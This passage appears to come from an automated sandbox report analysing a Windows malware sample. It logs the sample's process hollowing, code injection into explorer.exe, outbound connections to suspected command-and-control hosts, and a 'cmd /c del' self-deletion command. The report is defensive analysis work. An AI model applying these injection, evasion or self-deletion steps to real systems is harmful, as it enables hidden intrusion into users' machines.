          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5C450 mov eax, dword ptr fs:[00000030h]14_2_02E5C450
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5C450 mov eax, dword ptr fs:[00000030h]14_2_02E5C450
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E9740D mov eax, dword ptr fs:[00000030h]14_2_02E9740D
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E9740D mov eax, dword ptr fs:[00000030h]14_2_02E9740D
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E9740D mov eax, dword ptr fs:[00000030h]14_2_02E9740D
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]14_2_02E81C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]14_2_02E81C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]14_2_02E81C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]14_2_02E81C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]14_2_02E81C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]14_2_02E81C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]14_2_02E81C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]14_2_02E81C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]14_2_02E81C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]14_2_02E81C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]14_2_02E81C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]14_2_02E81C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]14_2_02E81C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]14_2_02E81C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46C0A mov eax, dword ptr fs:[00000030h]14_2_02E46C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46C0A mov eax, dword ptr fs:[00000030h]14_2_02E46C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46C0A mov eax, dword ptr fs:[00000030h]14_2_02E46C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46C0A mov eax, dword ptr fs:[00000030h]14_2_02E46C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFBC2C mov eax, dword ptr fs:[00000030h]14_2_02DFBC2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8FDE2 mov eax, dword ptr fs:[00000030h]14_2_02E8FDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8FDE2 mov eax, dword ptr fs:[00000030h]14_2_02E8FDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8FDE2 mov eax, dword ptr fs:[00000030h]14_2_02E8FDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8FDE2 mov eax, dword ptr fs:[00000030h]14_2_02E8FDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E78DF1 mov eax, dword ptr fs:[00000030h]14_2_02E78DF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46DC9 mov eax, dword ptr fs:[00000030h]14_2_02E46DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46DC9 mov eax, dword ptr fs:[00000030h]14_2_02E46DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46DC9 mov eax, dword ptr fs:[00000030h]14_2_02E46DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46DC9 mov ecx, dword ptr fs:[00000030h]14_2_02E46DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46DC9 mov eax, dword ptr fs:[00000030h]14_2_02E46DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46DC9 mov eax, dword ptr fs:[00000030h]14_2_02E46DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDD5E0 mov eax, dword ptr fs:[00000030h]14_2_02DDD5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDD5E0 mov eax, dword ptr fs:[00000030h]14_2_02DDD5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFFD9B mov eax, dword ptr fs:[00000030h]14_2_02DFFD9B
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFFD9B mov eax, dword ptr fs:[00000030h]14_2_02DFFD9B
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 142.111.76.118 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 15.165.26.252 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.130.43 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.198 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.appearwood.club
          Source: C:\Windows\explorer.exeDomain query: www.warungjitu.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.13.255.157 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.theartsutra.com
          Source: C:\Windows\explorer.exeDomain query: www.chestfreezersale.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.7.67 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.betbonusuk.com
          Source: C:\Windows\explorer.exeDomain query: www.rosewoodcibubur.com
          Source: C:\Windows\explorer.exeDomain query: www.omxpro.com
          Source: C:\Windows\explorer.exeDomain query: www.moretuantired.com
          Source: C:\Windows\explorer.exeDomain query: www.peridot.website
          Source: C:\Windows\explorer.exeDomain query: www.weluvweb.com
          Source: C:\Windows\explorer.exeDomain query: www.okitmall.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.206.71.220 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.emmajanetracy.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.56.126.26 80Jump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeMemory written: C:\Users\user\Desktop\s6G3ZtvHZg.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeThread register set: target process: 3292Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3292Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: BF0000Jump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess created: C:\Users\user\Desktop\s6G3ZtvHZg.exe C:\Users\user\Desktop\s6G3ZtvHZg.exeJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess created: C:\Users\user\Desktop\s6G3ZtvHZg.exe C:\Users\user\Desktop\s6G3ZtvHZg.exeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\s6G3ZtvHZg.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000002.507005396.0000000001400000.00000002.00000001.sdmp, help.exe, 0000000E.00000002.511685325.00000000053C0000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 00000004.00000002.507005396.0000000001400000.00000002.00000001.sdmp, help.exe, 0000000E.00000002.511685325.00000000053C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.507005396.0000000001400000.00000002.00000001.sdmp, help.exe, 0000000E.00000002.511685325.00000000053C0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.507005396.0000000001400000.00000002.00000001.sdmp, help.exe, 0000000E.00000002.511685325.00000000053C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000002.505741956.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 00000004.00000000.276627060.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Users\user\Desktop\s6G3ZtvHZg.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
